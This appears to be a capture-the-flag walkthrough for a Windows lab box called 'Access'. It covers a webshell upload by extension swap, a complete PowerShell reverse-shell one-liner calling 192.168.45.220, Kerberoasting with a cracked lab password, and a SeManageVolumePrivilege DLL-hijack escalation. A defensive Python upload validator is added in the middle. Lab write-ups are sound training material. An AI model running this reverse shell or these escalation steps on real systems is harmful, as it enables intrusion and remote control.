Access 🔸

Enumeration

The web server shows a page about the event.

Initial Access

We can upload images, so we can upload a webshell: intercept the upload request and change the extension from .png to .php...

File will be in /uploads (discovered with feroxbuster)
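The server-side check that this upload form is missing, as an added example (not code from the target application, and written in Python rather than the application's PHP). The function name stored_name, the exception UploadRejected and the allowlist are assumptions made for the illustration.

```python
import os
import secrets

# Allowlisted image types: extension -> magic bytes the content must start with.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    """Raised when an upload fails server-side validation (hypothetical name)."""


def stored_name(client_filename: str, data: bytes) -> str:
    """Validate an upload on the server and return the name to store it under.

    The client-supplied name is only read for its claimed extension. It is
    never used as the stored name, so a rewritten request cannot choose it.
    """
    # Drop any path components included in the client-supplied filename.
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match the claimed image type")
    # Random server-generated name carrying only the validated extension.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16        # constructed sample: PNG header
    script = b"<?php /* constructed sample */ ?>"    # constructed sample: not an image
    for name, body in [("logo.png", png), ("logo.php", png), ("logo.png", script)]:
        try:
            print(name, "->", stored_name(name, body))
        except UploadRejected as err:
            print(name, "rejected:", err)
```

A magic-byte check does not prove the file is a clean image, so the upload directory should also be configured so the web server never executes scripts from it.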

Now let's try to get a reverse shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.220',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Privilege Escalation

Transfer SharpHound and get the zip. See the data in BloodHound.

The user svc_mssql is kerberoastable.

We don't have the svc_apache password, so we have to execute the attack on the target. Transfer Rubeus there.

Using hashcat

We have svc_mssql:trustno1

To execute commands as this user we need RunasCs.

Using -Remote, we can redirect the shell to a remote host.

This user has SeManageVolumePrivilege

Using https://github.com/CsEnox/SeManageVolumeExploit

Download and transfer the exe

Now, following the README, generate a malicious DLL with msfvenom and transfer it to C:\windows\system32\spool\drivers\x64\3\PrintConfig.dll

Start a listener and trigger it

Post Exploitation